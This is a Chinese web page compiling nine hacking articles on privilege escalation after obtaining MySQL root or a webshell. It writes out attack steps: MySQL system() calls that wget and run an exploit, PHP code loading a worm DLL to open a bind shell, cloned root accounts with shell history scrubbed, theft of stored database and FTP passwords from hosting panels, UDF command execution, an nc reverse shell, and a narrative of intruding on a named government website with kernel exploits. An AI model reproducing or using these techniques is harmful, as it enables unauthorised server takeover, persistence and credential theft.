当前位置：首页 > 实用文档 > 其他范文> linux当mysql以root权限登录时提权网站安全

linux当mysql以root权限登录时提权网站安全

时间：2023-08-17 07:53:21 其他范文收藏本文下载本文

linux当mysql以root权限登录时提权网站安全（共9篇）由网友“心里有滴＊泪”投稿提供，这次小编给大家整理过的linux当mysql以root权限登录时提权网站安全，供大家阅读参考。

篇1：linux当mysql以root权限登录时提权网站安全

mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4，x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的明天再看看函数手册，再装一个实验一下。

mysql 5.x里面引入了一个system函数，这个函数可以执行系统命令，当mysql以root登陆的时候，就可以利用这个函数执行命令，当然是在权限许可的范围内。

一般我们按照常规思路，搞到mysql的root密码之后，我们都会连接上去，创建一个表，然后outfile，搞到一个webshell ,然后提权如此这般。今天我们换一种方式。

按照上面的方法，我们需要知道web的绝对路径，当然这个很不好找，有些有sqlinjection的，可能报错会显示出来，有的就不一定了，

但是按照我的的方法，没有必要再去找web路径了，直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;

直接这样就可以找到web的路径，当然，我们的目的并不是找web路径，放webshell进去。我们是要来做其他的事情，比如，下载exp执行，搞到 root权限，然后装后门虾米的

mysql>system wget xxxx.xxx.com/xxxx ;

mysql>system chmod +x xxxx;

mysql>system ./xxxx;

这样mysql的root此时就成为system的root了，剩下的事情，如果开了ssh,就ssh上去，输入mysql的用户密码，ok,搞定。

或者，直接提权之后，下载后门安装，这个就留给大家去研究了。

篇2：linux提权之mysql的root权限通过system函数提权网站安全

linux提权之mysql的root权限通过system函数提权

linux系统环境下，mysql以root权限登录时提权

mysql5.x 的linux版本下面有一个函数，可以帮助我们干很多猥琐的事情，这个函数4，x下面貌似没有，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的明天再看看函数手册，再装一个实验一下。

mysql 5.x里面引入了一个system函数，这个函数可以执行系统命令，当mysql以root登陆的时候，就可以利用这个函数执行命令，当然是在权限许可的范围内，

下面开始提权：

实验环境：

A:192.168.211.128 (mysql版本：5.0.77)

B：192.168.211.131

实验过程：

在B机上通过root用户(这里一定要区分，这个root用户是mysql的，并不是linux系统的)连接到A机的数据库

现在已经连到A机的数据库了，下来就开始调用system函数了。

好了，思路就到这里，剩下的大家自己发挥吧。

篇3：提权,以MySQL之名

来源: 防线

前不久网上公开了一个MySQL Func的漏洞,讲的是使用MySQL创建一个自定义的函数,然后通过这个函数来攻击服务器，最早看到相关的报道是在o-otik上,但是公布的是针对Unix系统的Exploit,并且成功率也不是很高.而近期,国内有高手放出针对Win系统的相关文章,于是我马上找来与朋友一同研究.

其实我们早就能想到.当我们在对MSSQL\Oracle数据库进行攻击的时候,得到了最数据库中高权限的帐户,往往都是执行特殊的扩展过程或者函数来进行攻击的。比如MSSQL有Xp_cmdshell,Oracle可以通过Msvcrt.dll来创建一个特殊的函数.而我们却始终没有想到,作为流行的数据库软件之一的MySQL,也是可以进行函数的创建的.由此看来,MySQL的这个漏洞不应称为漏洞而仅仅是一个技术而已.

废话一堆过后,我们来了解一下怎么在MySQL里创建一个函数吧.这比如何利用重要许多,只要了解了原理,运用就能更加灵活,而且可以与其他思想融会贯通.

MySQL中创建一个函数的语句为:

Create Function FunctionName Returns [String|Integer|Real] Soname 'C:\function.dll';

其中FunctionName指的是函数的名称,C:\Function.DLL指的是函数所调用的DLL,而函数名正是DLL中的函数名称.不过这里需要我们注意的是,如果我们需要MySQL可以在函数之中附带一个参数的话,那么就要符合UDF形式的程序编写规则,具体的可以查看MySQL手册的第14节:《为MySQL增加新函数》.而其中STRING,INTEGET,REAL是函数执行后所返回的值的形式.当然,我们大可不必遵循UDF形式的编写,其实如果我们的函数中使用一个我们要执行的代码,而不使用参数,一样可以达到攻击的效果,比如说System(“command.com”)等等.网上现在以此漏洞进行攻击的FurQ蠕虫就是一个不使用UDF格式的例子.但是注意,这个创建函数的语句必须要求我们所用的MySQL帐户有对mysql这个数据库的写权限,否则无法正常使用.

好了.了解了原理之后,我们来实战一下如何使用MySQL提升权限.

在这里我们已经通过各式各样的漏洞取得了一个服务器的WebShell,我这里演示的是angel的phpspy,因为PHP默认有连接MySQL的函数,而ASP这些需要使用附加的组件来进行连接,本身不具备条件的.

一般来说,在Win系统下面,很多软件都会在系统目录下创建一个叫my.ini的文件,其中包含了很敏感的MySQL信息.而如果我们攻克的主机没有非常好的权限设置的话,我们本身就具有对%windir%目录的浏览权限,所以可以非常容易的读取其中的信息.而且非常多的管理员通常是将root帐户与密码写进这个My.ini,所以一旦我们读到root用户的密码,就可以操纵整个MySQL数据库或者是服务器了.如图1.

得到MySQL的Root密码之后,我们需要上传我们的DLL文件,我这里使用的是从FurQ蠕虫中提取的FurQ.dll.执行这个FurQ.DLL中的Shell函数,系统将会在6666端口打开一个带密码的CMDShell,当然,密码我们已经知道,就是“FurQ”几个字符而已.不过我们现在还没有执行的条件.需要通过MySQL将这个函数创建到MySQL中去.

现在,我们用PHPSPY新建一个PHP文件.

输入以下的内容

$link=mysql_connect('127.0.0.1','root','root');

if (!$link) {

die('Could NOt Connect The Database!: ' . mysql_error);

};

echo “Good Boy.Connected!

”;

//这里的root\root就是从my.ini中读取的用户和密码.

@mysql_select_db('mysql') or die ('use database mysql failed!');

echo “Yes You Did!

”;

//这里选择使用MySQL数据库表.当然你也可以选择别的,如test.

$query=“Create Function Shell RETURNS INTEGER SONAME 'd:\\wwwroot\\FurQ.dll';”;

@$result = mysql_query($query, $link) or die (“Create Function Failed!”);

echo “Goddess...Successed!

”;

//这两句话是关键,执行MySQL的创建函数语句.将d:\wwwroot\furq.dll中的Shell函数创建进MySQL中.使得MySQL可以执行这个Shell函数.

$query=“Select Shell();”;

@$result = mysql_query($query, $link) or die (“Execute failed”);

echo “Congratulations! Connect The Port 6666 Of This Server VS password:FurQ

”;

//这一步是执行这个Shell函数,打开服务器的6666端口.

再次执行,全部正常返回.如图2.那么现在,我们就可以使用nc连接服务器的6666端口,输入这个密码:FurQ.然后就返回CMDSHELL了..当然,由于继承的是MySQL的权限,而Win系统下MySQL默认以服务安装,也就是说,我们得到的Shell为LocalSystem权限,可以为所欲为了,不过不要做坏事哦.呵呵.

篇4：对某root权限shell的进一步提权(jsp)

对方环境：Readhat+Tomcat+JSP+MYSQL5

shell是root系统权限也许有的同学问，都是root了还进一步~进到哪？

嗯~说下把，jsp的shell 我没见过能直接执行shell命令的.. 包括法克工具包里面的jsp shell 大多数都是改了下版权的一个jsFolder~~好吧不吐槽了，在这种情况下呢，我们要远程登陆他的ssh 需要怎么做？

嗯一般人都懂，直接编辑/etc/passwd和/etc/shadow呗~好吧

通过搜索发现网上转来转去的并无效果，也就是通常说的无密码即可进入的添加账号~本人测试未果，也许人品？不管~进入backtrack5 直接

cat /etc/passwd

复制root那一行然后继续

cat /etc/shadow

复制root那一行~~

获得

root:x:0:0:root:/root:/bin/bash

root:$6$TFlX/4Do$jU.K0t9TI1YteS73pW5LeQKuGCNSkg0QHonYsZtHCeRzUh4RxMFWEN/j/azrnGI1eJbdfpK1kZ1TNNIoL8AZ6.:15876:0:99999:7:::

这个就是root的密码了为了不重复我们改一些东西吧

root是用户我们改为r00t /root是主目录我们也要改就该为/home/root吧~！为什么？因为如果是/root 你登陆后所操作的一切都会被记录到history中有的同学问，直接history -c清除不就OK拉~我想说的是这样的话很容易引起管理员发觉~~

如果这样不小心被记录了，请不要急着清除~进入到shell或者创建用户后再次登陆然后编辑/root/.bash_history文件把自己操作的命令删除即可！

ok~改变后就是

r00t:x:0:0:root:/home/root:/bin/bash

r00t:$6$TFlX/4Do$jU.K0t9TI1YteS73pW5LeQKuGCNSkg0QHonYsZtHCeRzUh4RxMFWEN/j/azrnGI1eJbdfpK1kZ1TNNIoL8AZ6.:15876:0:99999:7:::

把第一行加入/etc/passwd 第二行加入/etc/shadow然后链接即可！

登陆账号:r00t 密码:toor

纯属科普大大牛请无视~

篇5：Windows与Linux本地用户提权体验网站安全

作者：甘肃老五

无论是Windows系统还是Linux系统都是基于权限控制的，其严格的用户等级和权限是系统安全的有力保证，这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行Windows及Linux下的提权测试。

一、windows下获取至高权限

大家知道，在Windows系统中SYSTEM是至高无上的超级管理员帐户。默认情况下，我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows桌面环境。实际上SYSTEM帐户早就已经“盘踞”在系统中了。想想也是，连负责用户验证的Winlogon、Lsass等进程都是以SYSTEM身份运行的，谁还能有资格检验SYSTEM呢?既然SYSTEM帐户早就已经出现在系统中，所以只需以SYSTEM帐户的身份启动Windows的Shell程序Explorer，就相当于用SYSTEM身份登录Windows了。

1、获得特权

打开命令提示符，输入命令“taskkill /f /im explorer.exe” 并回车，这个命令是结束当前账户explorer即图形用户界面的Shell。然后在命令提示符下继续输入“at time /interactive %systemroot%\explorer.exe”并回车。其中“time”为当前系统时间稍后的一个时间，比如间隔一秒，当前系统时间可以在命令提示符下输入“time”命令获得。一秒钟后会重新加载用户配置，以SYSTEM身份启动Windows的shell进程Explorer.exe。(图1)

2、身份验证

如何知道exeplorer.exe是以system权限运行呢?我通过“开始”菜单可以看到最上面显示的是system账户。另外，打开注册表编辑器，只要证明HKCU就是HKU\S-1-5-18的链接就可以了(S-1-5-18就是SYSTEM帐户的SID)。证明方法很简单：在HKCU下随便新建一个Test子项，然后刷新，再看看HKU\S-1-5-18下是否同步出现了Test子项，如果是，就说明系统当前加载的就是SYSTEM帐户的用户配置单元。当然最简单的是在命令提示符号下输入命令“whoami”进行验证，如图所示显示为“NT AUTHORITY\SYSTEM”这就证明当前exeplorer.exe是System权限。(图2)

3、大行其道

System权限的Explorer.exe在实际中有什么用呢?下面笔者随意列举几个使用实例。

(1).注册表访问

我们知道在非SYSTEM权限下，用户是没有权限访问某些注册表项的，比如“HKEY_LOCAL_MACHINE\SAM”、“HKEY_LOCAL_MACHINE\SECURITY”等。这些项记录的是系统的核心数据，某些病毒或者木马会光顾这里。比如在SAM项目下建立具有管理员权限的隐藏账户，这样的帐户在命令及“本地用户和组”管理器(lusrmgr.msc)中是无法看到的，造成了很大的安全隐患。在“SYSTEM”权限下，注册表的访问就没有任何障碍，我们打开注册表定位到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account”项下所有的隐藏帐户就都暴露了。(图3)

(2).访问系统还原文件

系统还原是windows系统的一种自我保护措施，它在每个磁盘根目录下建立“System Colume Information”文件夹，保存一些系统信息以备系统恢复是使用。该文件具有系统、隐藏属性管理员用户是没有操作权限的。正因为如此，它成了病毒、木马的栖身之地，我们就可以在System权限下进入该文件夹删除病毒。当然，你也可以关闭“系统还原”预防此类病毒，但这样未免显得被动，有些因噎废食。(图4)

(3).更换系统文件

Windows系统为系统文件做了保护机制，一般情况下你是不可能更换系统文件的，因为系统中都有系统文件的备份，它存在于c:\WINDOWS\system32\dllcache(假设你的系统装在C盘)。当你更换了系统文件后，系统自动就会从这个目录中恢复相应的系统文件。当目录中没有相应的系统文件的时候会弹出提示让你插入安装盘。

在实际应用中如果有时你需要Diy自己的系统修改一些系统文件，或者用高版本的系统文件更换低版本的系统文件，让系统功能提升。比如Window XP系统只支持一个用户远程登录，如果你要让它支持多用户的远程登录。要用Windows 的远程登录文件替换Window XP的相应文件。这在非SYSTEM权限下很难实现，但是在SYSTEM权限下就可以很容易实现。

从Windows 2003的系统中提取termsrv.dll文件，用该文件替换Windows XP的C:\WINDOWS\system32下的同名文件。(对于Windows XP SP2还必须替换C:\WINDOWS\$NtServicePackUninstall$和C:\WINDOWS\ServicePackFiles\i386目录下的同名文件)。再进行相应的系统设置即可让Windows XP支持多用户远程登录。

(4).手工杀毒

用户在使用电脑的过程中一般都是用Administrator或者其它的管理员用户登录的，中毒或者中马后，病毒、木马大都是以管理员权限运行的，

我们在系统中毒后一般都是用杀毒软件来杀毒，如果杀软瘫痪了，或者杀毒软件只能查出来，但无法清除，这时候就只能赤膊上阵，手工杀毒了。

在Adinistrator权限下，如果手工查杀对于有些病毒无能为力，一般要启动到安全模式下，有时就算到了安全模式下也无法清除干净。如果以SYSTEM权限登录，查杀病毒就容易得多。

以一次手工杀毒为例，(为了截图在虚拟机上模拟了前段时间的一次手工杀毒。)打“Windows 任务管理器”，发现有个可疑进程“86a01.exe”，在Administrator管理员下无法结束进程见图5，当然更无法删除在系统目录下的病毒原文件“86a01.exe”。以System权限登录系统，进程被顺利结束见图6，然后删除病毒原文件，清除注册表中的相关选项，病毒被彻底清理出系统。(图5)(图6)

System权限是比Administrator权限还高的系统最高权限，利用它可以完成很多常规情况下无法完成的任务。当然，最大的权限也就意味着更大的危险，不要因为手握“尚方宝剑”就滥杀无辜。

二、Linux下授权测试

类似于Windows系统Linux系统中用户是具有权限属性的，甚至它的权限设置更为严格。我们知道在Linux系统中root是管理员用户拥有最高的权限，除此之外的其他用户是普通用户其权限都是受限的。如何让普通用户也具有root权限当管理员使用呢?下面笔者搭建环境，以重启网络操作为例进行Root授权演示。

环境说明：

OS：Fedora Core 6 (域名：ns.linux.com.cn)

Tools：PuTTY(SSH/Telnet远程登录)

1、登录系统

运行PuTTY，首先以Root用户远程登录系统，输入用户名、密码成功登入系统。然后以普通用户hacker远程登录输入用户名、密码进入系统。

2、权限测试

在Root用户登录窗口中我们输入命令“/etc/init.d/network restart”重启网络服务，如图7所示启动成功。然后在hacker用户登录窗口输入同样的命令重启网络，显示失败，可以普通用户hacker是没有执行该命令的权限的。(图7)

3、Root授权

要使得普通用户hacker也具有重启网络的权限，我们需要修改/etc/sudoers文件。输入命令“ls -l /etc/sudoers”查看root用户默认对该文件只有“读”权限，是没有办法修改的。对此，我们可以修改其权限让Root用户可以修改，也可以用vi打开该文件修改然后强行保存退出，当然最方便的是用“visudo”命令进行编辑。

定位到“# User privilege specification”下，按照格式“username host username command”进行输入。其中第一个字段是用户名(被授权用户)，第二个自动是主机位(用域名、IP地址都可以)，第三个字段是用户名(授权用户)，第四个字段是命令(授权用户可以执行的命令，可以用别名)。结合实例我们添加如下字段：hacker All = (root) /etc/init.d/network 即授权hacker用户以Root权限运行/etc/init.d/network，最后保存退出。(图8)

4、权限测试

在hacker用户窗口中输入命令：sudo /etc/init.d/network restart，看hacker是否可以重启网络，如图9所示命令成功执行网络被重启，说明授权成功。这里必须要说明的是必须以“sudo”来运行命令，因为sudo命令会调用“/etc/sudoers”脚本，刚才的授权才会生效。另外，在命令执行前要输入密码，这个密码是当前用户即hacker的密码。(图9)

5、延伸

我们通过修改/etc/sudoers文件可以灵活地进行用户赋权，赋予不同的用户执行特殊命令的权限。/etc/sudoers文件中添加的信息，其中用户、命令都可以用别名，被授权用户可以是多个，命令可以是多条。我们通过修改该文件进行用户授权是一定要慎重，防止授权过大造成系统安全隐患。比如我们在该文件中添加这样的字段angel ALL = (ALL) ALL，这样的话angel用户就具有了系统的所有权限，就相当于另一个Root用户。下面我们操作测试一下。(图10)

新建test用户并设置密码，然后从在hacker登录窗口中通过命令su -angel 切换到angel用户，看看权限过大会产生什么后果。大家知道/etc/passwd是保存用户密码的文件，我们输入sudo vi /etc/passwd用sudo命令调用vi打开该文件，定位到root行，可以看到有个“x”号表示root用户设置了密码，我们删除“x”字段最后保存退出。输入命令more /etc/passwd | grep root查看“x”被成功删除，root用户就是空密码了。在angel窗口输入命令sudo root可以看到空密码可以进入到Root登录窗口。(图11)

总结：本文关于Windows、Linux本地用户提权测试，只是从技术上提供一个思路，至于提权以后可以用来干什么还需要我们大家深入挖掘。

篇6：谈对星外主机提权利用网站安全

T00LS上最近段时间谈了比较多星外提权的方法，最近刚好碰到了站结合些大牛的思路写个过程！目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本！上传了个BIN免杀ASPX大马其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限！RegShell读注册表没发现多少利用的东西，但是根据些信息知道是星外

对新手来说在这里很容易陷入困境！

星外sa密码注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位MD5加密很多情况下MD5跑不出有高人找到了个可写可执行目录C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ cmd.exe上传在这里可以执行些简单的命令如: set,systeminfo,ipconfig,ping,等~利用这些命令可以收到比较多的系统信息.

如果你比较幸运管理配置不当的话还可以DIR C.D.E等其他盘，很久以前小K(khjl1)给我发了个for命令利用，for命令比dir执行权限要小类似dir的功能大家可以在不能dir的情况下试下

for /r d:\freehost\ %i in (test) do @echo %i >>C:\路径\1.txt 把d:\freehost\所有文件写入1.txt在用VBS读IIS密码时候很多提到NC反弹,其实不需要很多情况下NC根本反弹不了,防火墙都挡住了.成功率很底，如果你失败了而非得继续NC的话可以试下这个兄弟的,大家或许可以根据这个方法测试下。反弹cmdshell：

“c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe”

通常都不会成功，

而直接在 cmd路径上输入 c:\windows\temp\nc.exe

命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。

******我是没成功,呵呵******

systeminfo看了下管理把补丁打得很齐全用VBS提权测试这里我们可以把iis.vbs上传到WEB跟目录下而不必传到Media Index目录但是提权工具必须传到Media Index才有权限执行切记~ C:\Documents and Settings\下有空格所以得用“”包含如:

CmdPath：

C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cmd.exe

Argument:

/c “c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe” d:\freehost\web\1.vbs

不包含的话会提示失败，所以细节决定成败！

iis.vbs列出了所有域名和路径当然也包括我们的目标站,试下用TYPE命令目标数据配置信息(提权下可以读些MSSQL或MYSQL的WEB配置等~~~信息方便提权)我这里只针对目标,这里库是ACCESS的再结合手上的几个VBS读IIS用户和密码用读出的密码21端口可以连接收工！

经常有人问我要免杀LCX,其实如果支持ASPX的话上面有个PortMap功能很多人没注意还是什么的,这个类似LCX做转发,在支持ASPX的站上就别传什么LCX了.免杀还麻烦以上根据别人和自己经验整理，其实也很简单的,方便些新手学习如有不足请提醒

篇7：HZHOST虚拟主机在提权中的进一步利用网站安全

1，c:\windows\temp下有hzhost主机留下的ftp登陆记录。有用户名和密码

2。是利用hzhost拿系统主机最高权限的。

安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass

经过了hzhost自己的加密方式，象eLVClO4tzsKBf#dee52443a3872cc159

这样的字符串。不过在hzhost后台可以还原！拿到了sa密码，或者root密码，最高权限就在眼前！禁止了w.s的话。大家就传aspx木马导撒！

我们传了一个asp木马上去后。在incs\constr.asp下面可以看到数据库连接串，

然后连接到数据库。通过执行

SELECT * FROM [hstlst]语句。可以看到很多主机记录

h_ftppass的密码和hzhost主机自己的加密串很相似。没错，主机管理的密码也是经过他自己的加密方式加了密！而我们在主机管理的地方

看到明文密码。说明他又给还原回来了。明白了么？我们先通过aspx木马导出mysql，mssql的root,sa密码加密串后

我们通过这条语句，修改别人的主机密码。

UPDATE [hstlst] SET h_ftppss=’aPWw3j4zMaK83lHMBof9fc298b1d3d0a’ WHERE h_ID=10000471

然后回过头去看主机密码。（这时候被转成了明文）

拿到了root密码为：sphil_070921注意：由于有多种限制。我截的图可能不是很完美。但是此方法绝对可行!

篇8：提权过程中Cant open shared library udf.dll错误的解决网站安全

朋友丢了一个webshell让我提权...我无聊就进去逛了下！全部是asp的...而且权限小的可怜几乎什么也做不了！

于是无聊在D盘乱翻！终于看见一个php的网站！寻找conn.php竟然意外发现是root权限！

哈哈.小兴奋一下.立即上传udf.dll.php提权！因为是Mysql5.1版本且服务器是windows的

因此导入到以下路径:C:\\Windows\\udf.dll [显示导出成功]！

继续执行命令：create function cmdshell returns string soname 'udf.dll'

杯具出现了：Can't open shared library 'udf.dll'

于是乎又满天的找解决办法.现与大家一起分享:

从MYSQL 5.1版本开始必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数，并且该目录默认是不存在的，这就需要我们使用webshell找到MYSQL的安装目录，并在安装目录下创建lib\plugin文件夹，然后将udf.dll文件导出到该目录即可，

提权过程中Cant open shared library udf.dll错误的解决网站安全

，

OK,问题解决了！准备添加用户：select cmdshell('net user black black /add');

又一次杯具的失败了！摸索原因才知道服务器管理员禁止.Net.exe和Net1.exe了！

但是意外的发现可以执行其他命令！

于是乎写了一个bat文件,通过注册表来完成下面的工作！[遇见问题一定要全方位多思考.通过其他思路寻找突破]

篇9：四川某市房管局网站服务器内部网络入侵纪实反弹Shell，Linux溢出提权。网站安全

摘要：《大中型网络入侵要案直击与防御》本章介绍的是开篇案例--四川某市房管局网站服务器内部网络入侵纪实，本节为大家介绍反弹Shell，Linux溢出提权。

21.2.6 反弹Shell，Linux溢出提权

mysql提权失败，转换入侵思路，可以考虑溢出提权，这也是在WebShell中常见的一种提权方式。不过在进行溢出提权时，用WebShell中的shell命令直接操作是无法获得提权后的CMD Shell的，因此必须先利用WebShell反弹到本地，建立一个CMD Shell窗口，在其中进行提权操作。

还是利用刚才的FTP账号上传一个PHP反弹shell工具，上传前修改设置其中的反弹IP地址为本机IP地址，端口为8888，上传后的链接地址为“www.**114.com/ zt/shell.php”。然后在本地打开命令提示符窗口，执行如下命令。

nc -l -vv -p 8888

使用nc监听本地的8888端口。在浏览器中访问“www.**114.com/zt/shell.php”，在nc监听的端口中，就可以获得一个从网站服务器（125.70.244.104）上返回来的命令行Shell了（图21-26）。

获得一个Shell，就可以稳定地进行操作，不会出现像在WebShell中操作时超时或无法连接的情况。现在考虑进行溢出提权。

截止到入侵的当前时间2009年7月为止，最新的Linux溢出提权漏洞有以下几个。

Linux Kernel 2.6.x UDEV Local Privilege Escalation ExploitLinux Kernel 2.6.x SCTP FWD Memory COrruption Remote ExploitLinux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit

其中第二个漏洞要求目标系统上至少运行了一个SCTP协议的程序，

SCTP不是一个常用的协议，但在电信网络骨干里会经常见到它，多个Linux发行版默认也不启用SCTP支持，多是以LKM的形式存在的。要利用这个漏洞就必须满足两个条件：系统默认支持SCTP或者加载sctp LKM，系统有一个SCTP用户空间程序监听某个sctp端口。而通过查看端口发现，目标系统中未运行SCTP协议，因此无法利用其进行攻击。只有考虑利用UDEV和ptrace_attach本地提权漏洞攻击。

先尝试最新的Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit漏洞，这个溢出漏洞利用程序有两个版本，一个是s0m3b0dy，另一个是prdelka版本，两个都是用C语言写的。先将s0m3b0dy版代码文件“s0m3b0dy.c”通过FTP上传，或者直接在返回的Shell窗口中用Wget命令下载到目标主机上。然后在Shell中执行如下命令进行编译。

gcc -o s0m3b0dy s0m3b0dy.c

编译成功生成溢出程序，执行如下命令。

./linux

执行编译程序进行溢出，但是在溢出时提示“Damn no r00t here:(”，看来溢出失败，提权不成功（图21-27）。

图21-26 监听本地端口图21-27 溢出失败

再传prdelka版溢出代码“prdelka.c”并进行编译，在编译时出现错误，执行编译程序后无任何反应。

再尝试用Linux Kernel 2.6.x UDEV Local Privilege Escalation Exploit进行溢出提权攻击，也未提权成功。

★ 端口转发软件rinetd安装部署linux服务器应用

★ 网站渗透思路全方面总结

★ 服务器安全配置讲座[转]服务器教程

★ 伪科学：Mysql system函数提权

★ FTP常用软件servu的安全权限处理WEB安全